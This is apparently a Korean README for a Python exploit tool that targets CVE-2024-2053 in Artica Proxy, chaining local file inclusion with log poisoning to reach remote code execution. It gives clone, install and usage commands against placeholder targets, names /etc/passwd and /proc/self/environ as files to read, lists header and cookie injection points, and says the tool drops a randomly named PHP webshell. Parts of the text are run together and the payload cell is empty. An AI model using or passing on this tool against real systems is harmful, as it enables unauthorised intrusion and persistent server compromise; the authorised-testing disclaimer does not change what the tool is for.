
CVE-2024-2053
이 Python3 스크립트는 로그 포이즈닝 기법을 통해 LFI(로컬 파일 포함) 취약점을 악용하여 RCE(원격 코드 실행)를 달성합니다. Artica Proxy (CVE-2024-2053)를 위해 특별히 설계되었지만 다른 LFI 시나리오에도 적용할 수 있습니다.
/etc/passwd, /proc/self/environ)git clone https://github.com/yourusername/artica-lfi-rce.git
cd artica-lfi-rce
pip3 install -r requirements.txtpython3 artica.py <target_url> <endpoint> [options]기본: python3 artica.py http://vulnerable.com /images.listener.php
프록시 사용: python3 artica.py https://target.com:9000 /vuln.php -p http://127.0.0.1:8080
상세 모드: python3 artica.py http://victim.com /endpoint.php -v
SSL 오류 무시: python3 artica.py https://self-signed.com /path.php --no-verify
이 도구는 교육 및 승인된 침투 테스트 목적으로만 제공됩니다. 개발자는 어떠한 책임도 지지 않으며, 이 프로그램으로 인한 오용이나 손해에 대해 책임지지 않습니다.
MIT License - Copyright (c) 2024
| 구성 요소 | 설명 |
|---|---|
| 페이로드 |
|
| 주입 지점 | User-Agent, Referer, Cookies, GET 파라미터 |
| 웹셸 | 무작위 파일명 (shell_[TIMESTAMP].php) |